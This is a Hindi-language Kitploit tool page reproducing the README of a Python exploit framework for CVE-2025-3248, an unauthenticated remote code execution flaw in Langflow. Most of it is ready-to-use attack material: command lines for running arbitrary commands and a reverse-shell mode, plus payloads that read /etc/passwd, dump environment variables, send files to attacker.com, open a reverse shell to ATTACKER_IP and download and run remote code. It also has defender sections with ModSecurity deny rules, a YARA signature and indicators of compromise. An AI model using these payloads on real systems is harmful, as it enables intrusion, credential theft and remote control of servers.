Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2025-3248-exploit — Langflow संस्करण ≤ 1.3.0 में एक गंभीर बिना प्रमाणीकरण वाली रिमोट कोड निष्पादन (RCE) भेद्यता, CVE-2025-3248 के परीक्षण और प्रदर्शन के लिए एक व्यापक Python शोषण फ्रेमवर्क। | Kitploit
उपकरण/GitHubGitHub/drackyjr/cve-2025-3248-exploit
भेद्यता स्कैनरकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापोस्ट-शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोललर्निंग और शिक्षा
रेड टीमिंग
पेलोड डेवलपमेंट
GitHubdrackyjr/cve-2025-3248-exploit

cve-2025-3248-exploit

Langflow संस्करण ≤ 1.3.0 में एक गंभीर बिना प्रमाणीकरण वाली रिमोट कोड निष्पादन (RCE) भेद्यता, CVE-2025-3248 के परीक्षण और प्रदर्शन के लिए एक व्यापक Python शोषण फ्रेमवर्क।

रिपॉजिटरी देखें
39 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-3248: Langflow अनऑथेंटिकेटेड RCE भेद्यता स्कैनर

License Python Status CVSS EPSS

लैंगफ्लो संस्करण ≤ 1.3.0 में CVE-2025-3248, एक गंभीर अनऑथेंटिकेटेड रिमोट कोड एक्ज़ीक्यूशन भेद्यता के परीक्षण और प्रदर्शन के लिए एक व्यापक पायथन एक्सप्लॉइटेशन फ्रेमवर्क।


🔴 भेद्यता अवलोकन

CVE-2025-3248: लैंगफ्लो कोड इंजेक्शन RCE

गुणमान
CVE आईडीCVE-2025-3248
उत्पादLangflow
प्रभावित संस्करण≤ 1.3.0
भेद्यता प्रकारअनऑथेंटिकेटेड रिमोट कोड निष्पादन (RCE)
हमला वेक्टरनेटवर्क
प्रमाणीकरण आवश्यककोई नहीं
CVSS स्कोर9.8 (गंभीर)
EPSS स्कोर92.57%
CWECWE-94 (कोड जनरेशन का अनुचित नियंत्रण)
भेद्य एंडपॉइंट/api/v1/validate/code

मूल कारण

यह भेद्यता /api/v1/validate/code API एंडपॉइंट में मौजूद है, जो मनमाना पायथन कोड स्वीकार करता है और उसे उचित इनपुट सैनिटाइज़ेशन या सैंडबॉक्सिंग के बिना पायथन के असुरक्षित exec() फ़ंक्शन का उपयोग करके मान्य करता है। यह भेद्यता पायथन के निम्नलिखित व्यवहार का शोषण करती है:

  1. डेकोरेटर फ़ंक्शन की परिभाषा के दौरान तुरंत मूल्यांकित किए जाते हैं
  2. डिफ़ॉल्ट आर्गुमेंट मान Abstract Syntax Tree (AST) पार्सिंग के दौरान निष्पादित किए जाते हैं
  3. दुर्भावनापूर्ण कोड निष्पादन को रोकने के लिए कोई इनपुट सत्यापन मौजूद नहीं है

हमला श्रृंखला

root@kitploit:~
Attacker → POST /api/v1/validate/code → Python exec() → RCE
     ↓
   No Auth Required
     ↓
   Arbitrary Python Code
     ↓
   System Command Execution

✨ विशेषताएँ

  • ✅ एंडपॉइंट डिटेक्शन: स्वचालित रूप से भेद्य लैंगफ्लो इंस्टेंस की पहचान करता है
  • ✅ मल्टी-स्टेज टेस्टिंग: 4 प्रगतिशील भेद्यता परीक्षण
  • ✅ कमांड निष्पादन: लक्ष्य पर मनमाने सिस्टम कमांड निष्पादित करें
  • ✅ एनवायरनमेंट एक्सट्रैक्शन: एनवायरनमेंट वेरिएबल और कॉन्फ़िगरेशन प्राप्त करें
  • ✅ फ़ाइल ऑपरेशन्स: फ़ाइल पढ़ने/लिखने की क्षमताओं का परीक्षण करें
  • ✅ रिवर्स शेल सपोर्ट: इंटरैक्टिव रिवर्स शेल सत्र शुरू करें
  • ✅ वर्जन डिटेक्शन: लैंगफ्लो संस्करण जानकारी की पहचान करें
  • ✅ रंग-कोडित आउटपुट: टर्मिनल रंगों के साथ बेहतर पठनीयता
  • ✅ टाइमआउट प्रबंधन: कॉन्फ़िगर करने योग्य अनुरोध टाइमआउट
  • ✅ SSL/TLS बायपास: स्व-हस्ताक्षरित प्रमाणपत्रों के लिए समर्थन

📦 आवश्यकताएँ

root@kitploit:~
Python >= 3.7
requests >= 2.25.0

निर्भरताएँ इंस्टॉल करें

root@kitploit:~
pip install requests

वैकल्पिक (बेहतर लॉगिंग के लिए)

root@kitploit:~
pip install colorama  # For Windows color support

🚀 इंस्टॉलेशन

विधि 1: GitHub से क्लोन करें

root@kitploit:~
git clone https://github.com/drackyjr/cve-2025-3248-exploit.git
cd cve-2025-3248-exploit
pip install -r requirements.txt
chmod +x cve_2025_3248_test.py

📖 उपयोग

मूल सिंटैक्स

root@kitploit:~
python3 cve_2025_3248_test.py -t <target_url> [options]

त्वरित आरंभ उदाहरण

1. बुनियादी भेद्यता स्कैन

root@kitploit:~
python3 cve_2025_3248_test.py -t http://target.com

2. कस्टम कमांड निष्पादित करें

root@kitploit:~
python3 cve_2025_3248_test.py -t http://target.com -c "whoami"

3. एकाधिक कमांड निष्पादित करें

root@kitploit:~
python3 cve_2025_3248_test.py -t http://target.com -c "cat /etc/passwd"

4. रिवर्स शेल शोषण (केवल अधिकृत परीक्षण)

चरण 1: अपनी मशीन पर netcat लिसनर शुरू करें

root@kitploit:~
nc -lvnp 4444

चरण 2: एक्सप्लॉइट चलाएँ

root@kitploit:~
python3 cve_2025_3248_test.py -t http://target.com --exploit --lhost YOUR_IP --lport 4444

उदाहरण:

root@kitploit:~
python3 cve_2025_3248_test.py -t http://192.168.1.100:7860 --exploit --lhost 192.168.1.50 --lport 4444

5. कस्टम टाइमआउट के साथ स्कैन करें

root@kitploit:~
python3 cve_2025_3248_test.py -t http://target.com --timeout 30

कमांड-लाइन आर्गुमेंट

root@kitploit:~
positional arguments:
  None

optional arguments:
  -t, --target TARGET       Target URL (e.g., http://target.com) [REQUIRED]
  -c, --command COMMAND     Command to execute (default: id)
  --timeout TIMEOUT         Request timeout in seconds (default: 10)
  --exploit                 Enable exploitation mode (reverse shell)
  --lhost LHOST            Your IP address for reverse shell
  --lport LPORT            Your port for reverse shell
  -h, --help               Show this help message

💾 पेलोड विविधताएँ

1. डेकोरेटर-आधारित निष्पादन

root@kitploit:~
payload = {
    "code": """
@exec("import os; os.system('whoami')")
def vulnerable_function():
    pass
"""
}

2. डिफ़ॉल्ट आर्गुमेंट निष्पादन

root@kitploit:~
payload = {
    "code": """
def test(arg=exec("__import__('subprocess').check_output(['id'])")):
    pass
"""
}

3. डेटा एक्सफ़िल्ट्रेशन

root@kitploit:~
payload = {
    "code": """
def test(x=exec("import requests; requests.post('http://attacker.com/exfil', data=open('/etc/passwd').read())")):
    pass
"""
}

4. रिवर्स शेल (वन-लाइनर)

root@kitploit:~
payload = {
    "code": """
def shell(x=exec("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ATTACKER_IP',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['/bin/sh','-i'])")):
    pass
"""
}

5. फ़ाइल पढ़ने के ऑपरेशन

root@kitploit:~
payload = {
    "code": """
def read_file(x=exec("print(open('/etc/passwd').read())")):
    pass
"""
}

6. एनवायरनमेंट वेरिएबल एन्यूमरेशन

root@kitploit:~
payload = {
    "code": """
def enum_env(x=exec("import os; print('\\n'.join([f'{k}={v}' for k,v in os.environ.items()]))")):
    pass
"""
}

7. डाउनलोड और निष्पादन

root@kitploit:~
payload = {
    "code": """
def download_exec(x=exec("import urllib.request; exec(urllib.request.urlopen('http://attacker.com/payload.py').read())")):
    pass
"""
}

🔍 डिटेक्शन और मिटिगेशन

डिफेंडरों के लिए

तत्काल कार्रवाई

  1. लैंगफ्लो अपग्रेड करें

    root@kitploit:~
    pip install langflow>=1.3.0
    # or
    docker pull langflow:latest
    
  2. नेटवर्क एक्सेस प्रतिबंधित करें

    root@kitploit:~
    # Nginx reverse proxy - block vulnerable endpoint
    location /api/v1/validate/code {
        deny all;
    }
    
  3. प्रमाणीकरण लागू करें

    root@kitploit:~
    # Add authentication middleware
    @app.middleware("http")
    async def auth_middleware(request, call_next):
        if "/api/v1/validate/code" in request.url.path:
            if not verify_auth(request):
                return JSONResponse(status_code=401)
        return await call_next(request)
    

WAF नियम

ModSecurity नियम:

root@kitploit:~
SecRule ARGS:code "@contains exec" "id:1001,phase:2,deny"
SecRule ARGS:code "@contains subprocess" "id:1002,phase:2,deny"
SecRule ARGS:code "@contains __import__" "id:1003,phase:2,deny"
SecRule ARGS:code "@contains os.system" "id:1004,phase:2,deny"

डिटेक्शन नियम

YARA सिग्नेचर:

root@kitploit:~
rule CVE_2025_3248_Langflow_RCE {
    strings:
        $api_path = "/api/v1/validate/code"
        $exec = "exec("
        $subprocess = "subprocess"
        $os_system = "os.system"
    condition:
        $api_path and any of ($exec, $subprocess, $os_system)
}

निगरानी और लॉगिंग

root@kitploit:~
# Monitor for suspicious requests
tail -f /var/log/nginx/access.log | grep "/api/v1/validate/code"

# Alert on POST requests to vulnerable endpoint
auditctl -w /var/lib/langflow -p wa -k langflow_changes

समझौता संकेतक (IoCs)

  • /api/v1/validate/code पर असामान्य POST अनुरोध
  • संदिग्ध नामों वाली लैंगफ्लो से जनित प्रक्रियाएँ
  • लैंगफ्लो सर्वर से अप्रत्याशित आउटबाउंड कनेक्शन
  • /tmp में असामान्य टाइमस्टैम्प के साथ बनाई गई फ़ाइलें
  • लैंगफ्लो प्रक्रिया से पायथन सबप्रोसेस निष्पादन
  • API अनुरोधों के साथ प्रमाणीकरण विफलताएँ
  • लैंगफ्लो कंटेनर से CPU/मेमोरी उपयोग में वृद्धि

🔬 तकनीकी विश्लेषण

भेद्यता कैसे काम करती है

भेद्यता श्रृंखला निम्नानुसार काम करती है:

root@kitploit:~
# Attacker sends this payload:
POST /api/v1/validate/code HTTP/1.1
Content-Type: application/json

{
    "code": "def func(x=exec('import os; os.system(\"whoami\")')): pass"
}

# Server processes it:
exec(code)  # ← Dangerous! No sanitization

# During AST parsing, the default argument is evaluated:
# exec('import os; os.system("whoami")')

# Result: Arbitrary command execution

डेकोरेटर क्यों काम करते हैं

फ़ंक्शन परिभाषा के दौरान डेकोरेटर के साथ पायथन का व्यवहार:

root@kitploit:~
# This code gets executed immediately:
@decorator_expression
def my_function():
    pass

# Which means this payload executes the code:
@exec("malicious_code_here")
def vulnerable_function():
    pass

यह गंभीर क्यों है

  1. कोई प्रमाणीकरण आवश्यक नहीं: कोई भी एंडपॉइंट तक पहुँच सकता है
  2. नेटवर्क से सुलभ: रिमोट से शोषण किया जा सकता है
  3. पूर्ण सिस्टम एक्सेस: लैंगफ्लो प्रक्रिया विशेषाधिकारों के साथ निष्पादित होता है
  4. कोई इनपुट सत्यापन नहीं: सीधा कोड निष्पादन
  5. व्यापक रूप से तैनात: उत्पादन वातावरण में उपयोग किया जाता है
  6. उच्च एक्सप्लॉइट उपलब्धता: सार्वजनिक POC उपलब्ध हैं

📊 भेद्यता समयरेखा

दिनांकघटना
2025-04-06भेद्यता खोजी गई और लैंगफ्लो टीम को रिपोर्ट की गई
2025-04-17सार्वजनिक एक्सप्लॉइट जारी किया गया (Exploit-DB)
2025-05-14FortiguardLabs आउटब्रेक अलर्ट जारी किया गया
2025-05-21Zscaler ThreatLabz विश्लेषण प्रकाशित हुआ
2025-05-22RecordedFuture ने सक्रिय शोषण की रिपोर्ट की
2025-06-16TrendMicro ने FLODRIC बॉटनेट शोषण की रिपोर्ट की
2025-06-17OffSec व्यापक विश्लेषण प्रकाशित हुआ
2025-11-05SentinelOne भेद्यता डेटाबेस प्रविष्टि
2025-11-20निरंतर शोषण प्रयास देखे गए

🛡️ रक्षात्मक परीक्षण चेकलिस्ट

अधिकृत सुरक्षा परीक्षण करते समय:

  • परीक्षण से पहले लिखित प्राधिकरण प्राप्त करें
  • सभी परीक्षण गतिविधियों का दस्तावेज़ीकरण करें
  • संभव होने पर पृथक परीक्षण वातावरण का उपयोग करें
  • अनावश्यक रूप से उत्पादन सिस्टम का शोषण करने से बचें
  • परीक्षण के दौरान बनाई गई किसी भी कलाकृति (फ़ाइलें, प्रक्रियाएँ) को साफ़ करें
  • निष्कर्षों को जिम्मेदारी से लक्ष्य संगठन को रिपोर्ट करें
  • जिम्मेदार प्रकटीकरण प्रथाओं का पालन करें
  • परीक्षण परिणामों की गोपनीयता बनाए रखें

📚 संदर्भ

  • OffSec ब्लॉग: CVE-2025-3248 विश्लेषण
  • SentinelOne: लैंगफ्लो कोड इंजेक्शन RCE
  • Zscaler ThreatLabz: CVE-2025-3248 RCE भेद्यता
  • TrendMicro: FLODRIC बॉटनेट शोषण
  • RecordedFuture: सक्रिय शोषण रिपोर्ट
  • Exploit-DB: लैंगफ्लो 1.3.0 RCE
  • GitHub सलाहकार: GHSA-c995-4fw3-j39m


🤝 योगदान

योगदान का स्वागत है! कृपया इन दिशानिर्देशों का पालन करें:

  1. रिपॉजिटरी को फ़ोर्क करें
  2. एक फ़ीचर ब्रांच बनाएँ (git checkout -b feature/amazing-feature)
  3. अपने बदलाव कमिट करें (git commit -m 'Add amazing feature')
  4. ब्रांच पर पुश करें (git push origin feature/amazing-feature)
  5. एक पुल रिक्वेस्ट खोलें

योगदान विचार

  • अतिरिक्त पेलोड विविधताएँ
  • वैकल्पिक शोषण तकनीकें
  • डिटेक्शन से बचने के तरीके
  • मिटिगेशन रणनीतियाँ
  • दस्तावेज़ीकरण सुधार
  • बग फिक्स


⚠️ अस्वीकरण

महत्वपूर्ण कानूनी सूचना:

यह टूल केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है। कंप्यूटर सिस्टम तक अनधिकृत पहुँच अवैध है और निम्नलिखित कानूनों का उल्लंघन करती है:

  • कंप्यूटर फ्रॉड एंड एब्यूज़ एक्ट (CFAA) - यूएसए
  • कंप्यूटर मिसयूज़ एक्ट - यूके
  • सूचना प्रौद्योगिकी अधिनियम (ITA) - भारत
  • आपके क्षेत्राधिकार में समान कानून

आप पूर्ण रूप से जिम्मेदार हैं:

  • ✅ परीक्षण से पहले सिस्टम मालिकों से स्पष्ट लिखित प्राधिकरण प्राप्त करना
  • ✅ सुनिश्चित करना कि सभी गतिविधियाँ स्थानीय और अंतर्राष्ट्रीय कानूनों का अनुपालन करती हैं
  • ✅ इस टूल का उपयोग केवल उन्हीं सिस्टम पर करना जिनके मालिक आप हैं या जिनके परीक्षण की अनुमति आपके पास है
  • ✅ सुरक्षा निष्कर्षों की गोपनीयता बनाए रखना
  • ✅ जिम्मेदार प्रकटीकरण प्रथाओं का पालन करना
  • ✅ इस टूल का उपयोग दुर्भावनापूर्ण उद्देश्यों के लिए न करना

इस टूल का उपयोग करके, आप सहमत हैं:

  • अनधिकृत पहुँच या क्षति के लिए इसका उपयोग नहीं करने के लिए
  • अपने कार्यों की पूर्ण कानूनी जिम्मेदारी स्वीकार करने के लिए
  • निर्माताओं को किसी भी दायित्व से क्षतिपूर्ति और मुक्त रखने के लिए
  • सभी लागू कानूनों और विनियमों का अनुपालन करने के लिए

निर्माता और योगदानकर्ता इस टूल के दुरुपयोग के लिए कोई दायित्व नहीं लेते हैं।

📖 अतिरिक्त संसाधन

शिक्षण सामग्री

  • OWASP कोड इंजेक्शन
  • CWE-94: कोड जनरेशन का अनुचित नियंत्रण
  • पायथन सुरक्षा: exec() के खतरे
  • रिवर्स शेल तकनीकें

अंतिम अपडेट: 21 नवंबर, 2025


root@kitploit:~
╔═══════════════════════════════════════════════════════════╗
║  CVE-2025-3248: Langflow RCE Vulnerability Scanner v1.0  ║
║  Use Responsibly - Authorized Testing Only               ║
╚═══════════════════════════════════════════════════════════╝
टूल डाउनलोड करें